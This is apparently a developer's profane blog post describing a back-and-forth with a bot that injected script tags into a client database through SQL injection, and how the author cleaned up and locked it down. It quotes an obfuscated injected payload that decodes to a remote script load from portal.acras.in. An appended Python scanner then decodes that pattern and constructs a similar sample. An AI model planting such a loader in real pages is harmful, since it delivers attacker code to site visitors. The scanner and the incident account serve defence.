portal.acras.in - garbage sucking lame ass bitches

Today was...invigorating... to say the least at my day job. We maintain a rather large code base for a client of ours that contained some older code in its deepest darkest nether-regions that allowed for some SQL injection to take place. Although I know I was likely fighting against some junk ass bot, it felt like my opponent was flesh and blood.

Here's how it went down:

BOT: Injects silly script tag

<script>my lame ass portal full of shit</script>

or...
<script>
var news="b20b3cb73b63b72b69b70b74b20b73b72b63b3db22b68b74b74b70b3ab2fb2fb70b6fb72b74b61b6cb2eb61b63b72b61b73b2eb69b6eb2fb6db6cb2eb70b68b70b22b3eb3cb2fb73b63b72b69b70b74b3e";
docs = news.replace(/b/g,'%');
document.write(that var named docs that I'm not actually going to put in here...);
</script>

ME: finds no trace in CF error logs and sets up a kill script in SQL to remove junk, continues to look for the entry point.
BOT: Injects more crap. This time changing the script's contents.
ME: creates a trigger on the targeted table to remove on update/insert - suck a fat one. continues to look for entry point.
BOT: ...
BOT: ...
BOT: ...
BOT: modifies script tags just enough to bypass trigger checks.
ME: hm, how clever you piece of junk.
ME: locks down the site's datasource to read-only and proceeds to set up read and read/write DSNs, some regex find and replace goodness and...once again...suck it!

I do enjoy a good duel from time to time, but not when I've got shit to do. So, whoever you are "portal.acras.in" nice try, but not good enough. DIAF KKTHXBYE.
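
One way to scan stored column values for injected script blocks without depending on the exact tag text, including the delimiter-swapped percent-encoding seen in the second sample above. This is an added example, not code from the original post; the function names, the sample rows and the example.test host are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Matches <script ...>...</script> regardless of case, attributes or spacing.
SCRIPT_RE = re.compile(r"<\s*script\b[^>]*>(.*?)<\s*/\s*script\s*>", re.I | re.S)
# Quoted string literals inside the script body.
LITERAL_RE = re.compile(r"""(["'])(.*?)\1""", re.S)
# Remote script source in decoded markup.
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.I)


def decode_swapped(literal):
    """Undo the 'replace delimiter with %' trick; return None if it does not apply."""
    if len(literal) < 3 or len(literal) % 3:
        return None
    delim = literal[0]
    if not re.fullmatch("(?:%s[0-9a-fA-F]{2})+" % re.escape(delim), literal):
        return None
    return unquote("".join("%" + literal[i + 1:i + 3] for i in range(0, len(literal), 3)))


def scan_value(value):
    """Return one finding per script block found in a stored column value."""
    findings = []
    for body in SCRIPT_RE.findall(value):
        finding = {"script": True, "hidden_src": []}
        for _, lit in LITERAL_RE.findall(body):
            decoded = decode_swapped(lit)
            if decoded:
                finding["hidden_src"] += SRC_RE.findall(decoded)
        findings.append(finding)
    return findings


def encode_swapped(markup, delim="b"):
    """Build a constructed sample in the same shape as the payload in the post."""
    return "".join(delim + "%02x" % ord(ch) for ch in markup)


# Constructed sample rows (example.test is a placeholder host, not from the post).
HIDDEN = encode_swapped('<script src="http://example.test/x.js"></script>')
ROWS = [
    "Quarterly news item",
    'News<ScRiPt >var news="%s"; docs = news.replace(/b/g,"%%");</sCrIpT >' % HIDDEN,
]

if __name__ == "__main__":
    for row in ROWS:
        print(scan_value(row))
```

A scan like this only helps with cleanup and alerting; the entry point itself still has to be closed in the query code.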

Comments
http://securitywatch.eweek.com/trojan_attacks/zeus...

Well what do ya know? it was a bot QQ :(
# Posted By Admin | 2/20/10 4:02 AM